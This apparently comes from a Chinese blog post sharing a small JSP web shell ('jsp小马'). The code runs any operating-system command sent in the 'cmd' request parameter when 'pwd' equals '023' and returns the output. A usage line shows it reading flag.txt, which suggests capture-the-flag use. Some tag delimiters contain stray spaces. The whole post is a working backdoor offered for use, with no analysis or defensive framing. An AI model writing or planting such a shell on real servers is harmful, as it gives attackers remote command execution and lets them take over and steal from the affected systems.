<% @ page language = "java" import = "java.util.*,java.io.*" pageEncoding = "UTF-8"%>
< % !public static String excuteCmd(String c)
{
StringBuilder line = new StringBuilder();
try
{
Process pro = Runtime.getRuntime().exec(c);
BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
String temp = null;
while ((temp = buf.readLine()) != null)
{
line.append(temp + "\\n");
}buf.close();
}
catch (Exception e)
{
line.append(e.getMessage());
}
return line.toString();
}% >
< %
if ("023".equals(request.getParameter("pwd")) && !"".equals(request.getParameter("cmd")))
{
out.println("<pre>" + excuteCmd(request.getParameter("cmd")) + "</pre>");
}
else {
out.println(":-)");
}
% >
利用http://127.0.0.1/chendi17.jsp?&pwd=023&cmd=cat%20flag.txt
分享一段jsp小马
最新推荐文章于 2021-11-13 12:40:03 发布